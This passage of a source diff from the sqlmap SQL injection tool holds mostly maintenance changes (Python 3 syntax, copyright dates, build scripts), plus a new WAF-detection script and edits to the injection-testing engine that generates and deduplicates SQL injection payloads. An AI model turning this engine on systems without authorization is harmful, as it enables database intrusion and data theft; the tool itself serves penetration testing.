-INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
+INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
 if [ -n "$INCREMENTED" ]
 then
 sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH
@@ -29,4 +39,4 @@ then
 fi
 
 truncate -s 0 "$CHECKSUM_FULLPATH"
-cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
+cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -name "*_" -o -type f -regex "./[^./]*" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
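The embedded python -c one-liner above is what bumps the VERSION string in lib/core/settings.py on every commit: the version is padded to four components, the last component acts as a per-month build counter, and the next-to-last component records the current month. A hedged, expanded sketch of that arithmetic (function name is illustrative):

    import re
    import time

    def bump_version_line(line):
        # line looks like: VERSION = "1.3.4.12"
        version = re.search('"([0-9.]*)"', line).group(1)
        parts = version.split('.')
        parts.extend(['0'] * (4 - len(parts)))   # pad to major.minor.month.build
        parts[-1] = str(int(parts[-1]) + 1)      # bump the build counter
        month = str(time.gmtime().tm_mon)
        if parts[-2] != month:                   # first commit of a new month ...
            parts[-1] = '0'                      # ... restarts the counter
        parts[-2] = month                        # and records the current month
        return line.replace(version, '.'.join(parts))

    # For example, during April: 'VERSION = "1.3.4.12"' -> 'VERSION = "1.3.4.13"'.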
extra/shutils/pycodestyle.sh (new executable file, 7 lines)
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+# See the file 'LICENSE' for copying permission
+
+# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
+find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \;
@@ -3,6 +3,8 @@
 # Runs pylint on all python scripts found in a directory tree
 # Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
 
+from __future__ import print_function
+
 import os
 import re
 import sys
@@ -17,26 +19,26 @@ def check(module):
 
 if module[-3:] == ".py":
 
-print "CHECKING ", module
+print("CHECKING ", module)
 pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
 for line in pout:
 if re.match(r"\AE:", line):
-print line.strip()
+print(line.strip())
 if __RATING__ and "Your code has been rated at" in line:
-print line
+print(line)
 score = re.findall(r"\d.\d\d", line)[0]
 total += float(score)
 count += 1
 
 if __name__ == "__main__":
 try:
-print sys.argv
+print(sys.argv)
 BASE_DIRECTORY = sys.argv[1]
 except IndexError:
-print "no directory specified, defaulting to current working directory"
+print("no directory specified, defaulting to current working directory")
 BASE_DIRECTORY = os.getcwd()
 
-print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
+print("looking for *.py scripts in subdirectories of ", BASE_DIRECTORY)
 for root, dirs, files in os.walk(BASE_DIRECTORY):
 if any(_ in root for _ in ("extra", "thirdparty")):
 continue
@@ -45,6 +47,6 @@ if __name__ == "__main__":
 check(filepath)
 
 if __RATING__:
-print "==" * 50
-print "%d modules found" % count
-print "AVERAGE SCORE = %.02f" % (total / count)
+print("==" * 50)
+print("%d modules found" % count)
+print("AVERAGE SCORE = %.02f" % (total / count))
@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -25,10 +25,16 @@ from setuptools import setup, find_packages
 setup(
     name='sqlmap',
     version='$VERSION',
-    description="Automatic SQL injection and database takeover tool",
+    description='Automatic SQL injection and database takeover tool',
+    long_description='sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.',
     author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar',
     author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
-    url='https://sqlmap.org',
+    url='http://sqlmap.org',
+    project_urls={
+        'Documentation': 'https://github.com/sqlmapproject/sqlmap/wiki',
+        'Source': 'https://github.com/sqlmapproject/sqlmap/',
+        'Tracker': 'https://github.com/sqlmapproject/sqlmap/issues',
+    },
     download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
     license='GNU General Public License v2 (GPLv2)',
     packages=find_packages(),
@@ -60,7 +66,7 @@ cat > sqlmap/__init__.py << EOF
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,8 +1,10 @@
 #!/usr/bin/env python

-# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission

+from __future__ import print_function
+
 import codecs
 import inspect
 import os
@@ -27,7 +29,7 @@ SMTP_SERVER = "127.0.0.1"
 SMTP_PORT = 25
 SMTP_TIMEOUT = 30
 FROM = "regressiontest@sqlmap.org"
-#TO = "dev@sqlmap.org"
+# TO = "dev@sqlmap.org"
 TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
 SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber())
 TARGET = "debian"
@@ -56,8 +58,8 @@ def send_email(msg):
         s.sendmail(FROM, TO, msg.as_string())
         s.quit()
     # Catch all for SMTP exceptions
-    except smtplib.SMTPException, e:
-        print "Failure to send email: %s" % str(e)
+    except smtplib.SMTPException as ex:
+        print("Failure to send email: '%s" % ex)

 def failure_email(msg):
     msg = prepare_email(msg)
@@ -83,7 +85,7 @@ def main():
     if stderr:
         failure_email("Execution of regression test failed with error:\n\n%s" % stderr)

-    failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
+    failed_tests = re.findall(r"running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)

     for failed_test in failed_tests:
         title = failed_test[0]
@@ -157,7 +159,7 @@ if __name__ == "__main__":

     try:
         main()
-    except Exception, e:
+    except Exception:
         log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc()))

     log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()))
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,10 +1,12 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

+from __future__ import print_function
+
 import cookielib
 import re
 import socket
@@ -75,8 +77,8 @@ def main():
         except KeyboardInterrupt:
             raise

-        except Exception, msg:
-            print msg
+        except Exception as ex:
+            print(ex)

         if abort:
             break
@@ -86,7 +88,7 @@ def main():
     sys.stdout.write("---------------\n")

     for sqlfile in files:
-        print sqlfile
+        print(sqlfile)

         try:
             req = urllib2.Request(sqlfile)
@@ -118,8 +120,8 @@ def main():
         except KeyboardInterrupt:
             raise

-        except Exception, msg:
-            print msg
+        except Exception as ex:
+            print(ex)

         else:
             i += 1
extra/wafdetectify/__init__.py (new file, 8 lines)
@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+pass
extra/wafdetectify/wafdetectify.py (new executable file, 134 lines)
@@ -0,0 +1,134 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from __future__ import print_function
+
+import cookielib
+import glob
+import httplib
+import inspect
+import os
+import re
+import socket
+import ssl
+import subprocess
+import sys
+import urllib2
+
+sys.dont_write_bytecode = True
+
+if hasattr(ssl, "_create_unverified_context"):
+    ssl._create_default_https_context = ssl._create_unverified_context
+
+NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "sqlmap developers (@sqlmap)"
+TIMEOUT = 10
+HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "identity", "Cache-Control": "max-age=0"}
+SQLMAP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
+SCRIPTS_DIR = os.path.join(SQLMAP_DIR, "waf")
+LEVEL_COLORS = {"o": "\033[00;94m", "x": "\033[00;91m", "!": "\033[00;93m", "i": "\033[00;92m"}
+CACHE = {}
+WAF_FUNCTIONS = []
+
+def get_page(get=None, url=None, host=None, data=None):
+    key = (get, url, host, data)
+
+    if key in CACHE:
+        return CACHE[key]
+
+    page, headers, code = None, {}, httplib.OK
+
+    url = url or ("%s%s%s" % (sys.argv[1], '?' if '?' not in sys.argv[1] else '&', get) if get else sys.argv[1])
+    if not url.startswith("http"):
+        url = "http://%s" % url
+
+    try:
+        req = urllib2.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, HEADERS)
+        conn = urllib2.urlopen(req, timeout=TIMEOUT)
+        page = conn.read()
+        headers = conn.info()
+    except Exception as ex:
+        code = getattr(ex, "code", None)
+        page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "")
+        headers = ex.info() if hasattr(ex, "info") else {}
+
+    result = CACHE[key] = page, headers, code
+
+    return result
+
+def colorize(message):
+    if not subprocess.mswindows and sys.stdout.isatty():
+        message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message)
+        message = message.replace("@sqlmap", "\033[00;96m@sqlmap\033[00;49m")
+        message = message.replace(NAME, "\033[00;93m%s\033[00;49m" % NAME)
+
+    return message
+
+def main():
+    global WAF_FUNCTIONS
+
+    print(colorize("%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)))
+
+    if len(sys.argv) < 2:
+        exit(colorize("[x] usage: python %s <hostname>" % os.path.split(__file__)[-1]))
+
+    cookie_jar = cookielib.CookieJar()
+    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
+    urllib2.install_opener(opener)
+
+    sys.path.insert(0, SQLMAP_DIR)
+
+    for found in glob.glob(os.path.join(SCRIPTS_DIR, "*.py")):
+        dirname, filename = os.path.split(found)
+        dirname = os.path.abspath(dirname)
+
+        if filename == "__init__.py":
+            continue
+
+        if dirname not in sys.path:
+            sys.path.insert(0, dirname)
+
+        try:
+            if filename[:-3] in sys.modules:
+                del sys.modules[filename[:-3]]
+            module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or "utf8"))
+        except ImportError as ex:
+            exit(colorize("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], ex)))
+
+        _ = dict(inspect.getmembers(module))
+        if "detect" not in _:
+            exit(colorize("[x] missing function 'detect(get_page)' in WAF script '%s'" % found))
+        else:
+            WAF_FUNCTIONS.append((_["detect"], _.get("__product__", filename[:-3])))
+
+    WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower())
+
+    print(colorize("[i] checking '%s'..." % sys.argv[1]))
+
+    hostname = sys.argv[1].split("//")[-1].split('/')[0]
+    try:
+        socket.getaddrinfo(hostname, None)
+    except socket.gaierror:
+        print(colorize("[x] host '%s' does not exist" % hostname))
+        exit(1)
+
+    found = False
+    for function, product in WAF_FUNCTIONS:
+        if found and "unknown" in product.lower():
+            continue
+
+        if function(get_page):
+            exit(colorize("[!] WAF/IPS identified as '%s'" % product))
+
+    if not found:
+        print(colorize("[o] nothing found"))
+
+    print()
+
+    exit(int(not found))
+
+if __name__ == "__main__":
+    main()
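The new wafdetectify.py above targets Python 2 (cookielib, httplib, urllib2, xrange, subprocess.mswindows). A minimal Python 3 sketch of the idea behind its get_page() helper, i.e. a memoizing fetch keyed on the request so each WAF script reuses already downloaded responses, assuming only the standard urllib.request module, could look like:

    import urllib.request

    CACHE = {}
    TIMEOUT = 10

    def get_page(url, data=None):
        key = (url, data)
        if key in CACHE:                      # reuse a previously fetched response
            return CACHE[key]
        page, headers, code = None, {}, 200
        try:
            conn = urllib.request.urlopen(urllib.request.Request(url, data), timeout=TIMEOUT)
            page, headers = conn.read(), conn.info()
        except Exception as ex:               # HTTP errors may still carry a body and headers
            code = getattr(ex, "code", None)
            page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "")
            headers = ex.info() if hasattr(ex, "info") else {}
        CACHE[key] = (page, headers, code)
        return CACHE[key]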
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -75,7 +75,7 @@ def action():
     if conf.getPasswordHashes:
         try:
             conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
-        except SqlmapNoneDataException, ex:
+        except SqlmapNoneDataException as ex:
             logger.critical(ex)
         except:
             raise
@@ -83,7 +83,7 @@ def action():
     if conf.getPrivileges:
         try:
             conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
-        except SqlmapNoneDataException, ex:
+        except SqlmapNoneDataException as ex:
             logger.critical(ex)
         except:
             raise
@@ -91,7 +91,7 @@ def action():
     if conf.getRoles:
         try:
             conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
-        except SqlmapNoneDataException, ex:
+        except SqlmapNoneDataException as ex:
             logger.critical(ex)
         except:
             raise
@@ -140,11 +140,11 @@ def action():
         conf.dbmsHandler.udfInjectCustom()

     # File system options
-    if conf.rFile:
-        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile))
+    if conf.fileRead:
+        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead))

-    if conf.wFile:
-        conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)
+    if conf.fileWrite:
+        conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType)

     # Operating system options
     if conf.osCmd:
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -13,6 +13,7 @@ import random
 import re
 import socket
 import subprocess
+import sys
 import tempfile
 import time

@@ -47,6 +48,7 @@ from lib.core.common import unArrayizeValue
 from lib.core.common import urlencode
 from lib.core.common import wasLastResponseDBMSError
 from lib.core.common import wasLastResponseHTTPError
+from lib.core.convert import unicodeencode
 from lib.core.defaults import defaults
 from lib.core.data import conf
 from lib.core.data import kb
@@ -54,6 +56,7 @@ from lib.core.data import logger
 from lib.core.datatype import AttribDict
 from lib.core.datatype import InjectionDict
 from lib.core.decorators import cachedmethod
+from lib.core.decorators import stackedmethod
 from lib.core.dicts import FROM_DUMMY_TABLE
 from lib.core.enums import DBMS
 from lib.core.enums import HASHDB_KEYS
@@ -66,11 +69,14 @@ from lib.core.enums import NULLCONNECTION
 from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
 from lib.core.enums import REDIRECTION
+from lib.core.enums import WEB_PLATFORM
 from lib.core.exception import SqlmapConnectionException
+from lib.core.exception import SqlmapDataException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSkipTargetException
 from lib.core.exception import SqlmapUserQuitException
+from lib.core.settings import BOUNDED_INJECTION_MARKER
 from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH
 from lib.core.settings import CHECK_INTERNET_ADDRESS
 from lib.core.settings import CHECK_INTERNET_VALUE
@@ -80,14 +86,17 @@ from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
 from lib.core.settings import FI_ERROR_REGEX
 from lib.core.settings import FORMAT_EXCEPTION_STRINGS
 from lib.core.settings import HEURISTIC_CHECK_ALPHABET
-from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
+from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
 from lib.core.settings import IDS_WAF_CHECK_RATIO
 from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
 from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
 from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
+from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS
+from lib.core.settings import SINGLE_QUOTE_MARKER
 from lib.core.settings import SLEEP_TIME_MARKER
 from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
 from lib.core.settings import SUPPORTED_DBMS
+from lib.core.settings import UNICODE_ENCODING
 from lib.core.settings import URI_HTTP_HEADER
 from lib.core.settings import UPPER_RATIO_BOUND
 from lib.core.threads import getCurrentThreadData
@@ -110,6 +119,9 @@ def checkSqlInjection(place, parameter, value):
     if value.isdigit():
         kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
         boundaries = kb.cache.intBoundaries
+    elif value.isalpha():
+        kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
+        boundaries = kb.cache.alphaBoundaries
     else:
         boundaries = conf.boundaries

@@ -143,8 +155,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# error message, simple heuristic check or via DBMS-specific
|
# error message, simple heuristic check or via DBMS-specific
|
||||||
# payload), ask the user to limit the tests to the fingerprinted
|
# payload), ask the user to limit the tests to the fingerprinted
|
||||||
# DBMS
|
# DBMS
|
||||||
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
|
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
||||||
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
|
||||||
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
||||||
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
|
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
|
||||||
@@ -153,9 +164,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# message, via simple heuristic check or via DBMS-specific
|
# message, via simple heuristic check or via DBMS-specific
|
||||||
# payload), ask the user to extend the tests to all DBMS-specific,
|
# payload), ask the user to extend the tests to all DBMS-specific,
|
||||||
# regardless of --level and --risk values provided
|
# regardless of --level and --risk values provided
|
||||||
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
|
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
||||||
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
|
|
||||||
kb.heuristicDbms or injection.dbms):
|
|
||||||
msg = "for the remaining tests, do you want to include all tests "
|
msg = "for the remaining tests, do you want to include all tests "
|
||||||
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
msg += "level (%d)" % conf.level if conf.level < 5 else ""
|
msg += "level (%d)" % conf.level if conf.level < 5 else ""
|
||||||
@@ -203,7 +212,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
continue
|
continue
|
||||||
|
|
||||||
match = re.search(r"(\d+)-(\d+)", test.request.columns)
|
match = re.search(r"(\d+)-(\d+)", test.request.columns)
|
||||||
if injection.data and match:
|
if match and injection.data:
|
||||||
lower, upper = int(match.group(1)), int(match.group(2))
|
lower, upper = int(match.group(1)), int(match.group(2))
|
||||||
for _ in (lower, upper):
|
for _ in (lower, upper):
|
||||||
if _ > 1:
|
if _ > 1:
|
||||||
@@ -239,9 +248,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
# Skip tests if title, vector or DBMS is not included by the
|
# Skip tests if title, vector or DBMS is not included by the
|
||||||
# given test filter
|
# given test filter
|
||||||
if conf.testFilter and not any(conf.testFilter in str(item) or \
|
if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
|
||||||
re.search(conf.testFilter, str(item), re.I) for item in \
|
|
||||||
(test.title, test.vector, payloadDbms)):
|
|
||||||
debugMsg = "skipping test '%s' because its " % title
|
debugMsg = "skipping test '%s' because its " % title
|
||||||
debugMsg += "name/vector/DBMS is not included by the given filter"
|
debugMsg += "name/vector/DBMS is not included by the given filter"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -249,9 +256,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
# Skip tests if title, vector or DBMS is included by the
|
# Skip tests if title, vector or DBMS is included by the
|
||||||
# given skip filter
|
# given skip filter
|
||||||
if conf.testSkip and any(conf.testSkip in str(item) or \
|
if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
|
||||||
re.search(conf.testSkip, str(item), re.I) for item in \
|
|
||||||
(test.title, test.vector, payloadDbms)):
|
|
||||||
debugMsg = "skipping test '%s' because its " % title
|
debugMsg = "skipping test '%s' because its " % title
|
||||||
debugMsg += "name/vector/DBMS is included by the given skip filter"
|
debugMsg += "name/vector/DBMS is included by the given skip filter"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -333,6 +338,23 @@ def checkSqlInjection(place, parameter, value):
             logger.debug(debugMsg)
             continue

+        if stype == PAYLOAD.TECHNIQUE.UNION:
+            match = re.search(r"(\d+)-(\d+)", test.request.columns)
+            if match and not injection.data:
+                _ = test.request.columns.split('-')[-1]
+                if conf.uCols is None and _.isdigit() and int(_) > 10:
+                    if kb.futileUnion is None:
+                        msg = "it is not recommended to perform "
+                        msg += "extended UNION tests if there is not "
+                        msg += "at least one other (potential) "
+                        msg += "technique found. Do you want to skip? [Y/n] "
+                        kb.futileUnion = not readInput(msg, default='Y', boolean=True)
+
+                    if kb.futileUnion is False:
+                        debugMsg = "skipping test '%s'" % title
+                        logger.debug(debugMsg)
+                        continue
+
         infoMsg = "testing '%s'" % title
         logger.info(infoMsg)

@@ -342,7 +364,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
# Parse test's <request>
|
# Parse test's <request>
|
||||||
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
|
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
|
||||||
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
|
||||||
|
|
||||||
for boundary in boundaries:
|
for boundary in boundaries:
|
||||||
injectable = False
|
injectable = False
|
||||||
@@ -404,11 +426,14 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
templatePayload = None
|
templatePayload = None
|
||||||
vector = None
|
vector = None
|
||||||
|
|
||||||
|
origValue = value
|
||||||
|
if kb.customInjectionMark in origValue:
|
||||||
|
origValue = origValue.split(kb.customInjectionMark)[0]
|
||||||
|
origValue = re.search(r"(\w*)\Z", origValue).group(1)
|
||||||
|
|
||||||
# Threat the parameter original value according to the
|
# Threat the parameter original value according to the
|
||||||
# test's <where> tag
|
# test's <where> tag
|
||||||
if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:
|
if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:
|
||||||
origValue = value
|
|
||||||
|
|
||||||
if kb.tamperFunctions:
|
if kb.tamperFunctions:
|
||||||
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
|
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
|
||||||
elif where == PAYLOAD.WHERE.NEGATIVE:
|
elif where == PAYLOAD.WHERE.NEGATIVE:
|
||||||
@@ -418,7 +443,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
if conf.invalidLogical:
|
if conf.invalidLogical:
|
||||||
_ = int(kb.data.randomInt[:2])
|
_ = int(kb.data.randomInt[:2])
|
||||||
origValue = "%s AND %s=%s" % (value, _, _ + 1)
|
origValue = "%s AND %s LIKE %s" % (origValue, _, _ + 1)
|
||||||
elif conf.invalidBignum:
|
elif conf.invalidBignum:
|
||||||
origValue = kb.data.randomInt[:6]
|
origValue = kb.data.randomInt[:6]
|
||||||
elif conf.invalidString:
|
elif conf.invalidString:
|
||||||
@@ -439,11 +464,13 @@ def checkSqlInjection(place, parameter, value):
                 boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
                 boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
                 reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)

                 if reqPayload:
-                    if reqPayload in seenPayload:
+                    stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?<!LIKE))|\d+)(_|\b|\Z)", r"\g<1>.\g<4>", reqPayload)
+                    if stripPayload in seenPayload:
                         continue
                     else:
-                        seenPayload.add(reqPayload)
+                        seenPayload.add(stripPayload)
                 else:
                     reqPayload = None

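The new stripPayload expression masks the random four-letter identifiers and numeric literals that sqlmap embeds into each generated payload, so two payloads that differ only in those random parts are recognized as duplicates and tested once. An illustrative standalone check of that regex (the two example payloads are made up):

    import re

    def strip_payload(payload):
        # replace random 4-letter tokens (except "LIKE") and numbers with '.'
        return re.sub(r"(\A|\b|_)([A-Za-z]{4}((?<!LIKE))|\d+)(_|\b|\Z)", r"\g<1>.\g<4>", payload)

    a = strip_payload("' AND 4321=4321 AND 'qWer'='qWer")
    b = strip_payload("' AND 7708=7708 AND 'ZxCv'='ZxCv")
    print(a == b)  # True: both normalize to the same masked form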
@@ -451,13 +478,13 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# payload was successful
|
# payload was successful
|
||||||
# Parse test's <response>
|
# Parse test's <response>
|
||||||
for method, check in test.response.items():
|
for method, check in test.response.items():
|
||||||
check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
